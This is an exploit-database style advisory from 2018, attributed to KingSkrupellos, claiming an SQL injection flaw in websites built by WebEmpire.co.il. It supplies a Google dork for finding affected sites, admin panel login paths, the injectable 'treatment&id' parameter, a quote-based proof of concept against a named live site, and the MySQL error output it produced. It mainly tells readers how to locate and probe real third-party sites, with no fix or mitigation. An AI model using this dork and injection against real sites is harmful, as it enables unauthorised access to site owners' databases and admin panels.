################################################################################​################# # Exploit Title : WebEmpire.co.il נבנה ע"י Hosting Web Design Israel SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 14/09/2018 # Vendor Homepage : webempire.co.il # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################​################# # Google Dork : intext:''WebEmpire נבנה ע"י'' # Admin Panel Login Path : /?app=mob_login /manager # Exploit : /?app=treatment&id=[SQL Injection] ################################################################################​################# # Example Site => d-a.co.il/?app=treatment&id=12%27 => [ Proof of Concept ] => archive.is/sLXP7 # SQL Database Error => runsql Error Query: 'SELECT id FROM treatment WHERE id> ORDER BY id LIMIT 1' 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY id LIMIT 1' at line 1 runsql Error Query: 'SELECT id FROM treatment WHERE id< ORDER BY id DESC LIMIT 1' 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY id DESC LIMIT 1' at line 1 ################################################################################​################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ################################################################################​#################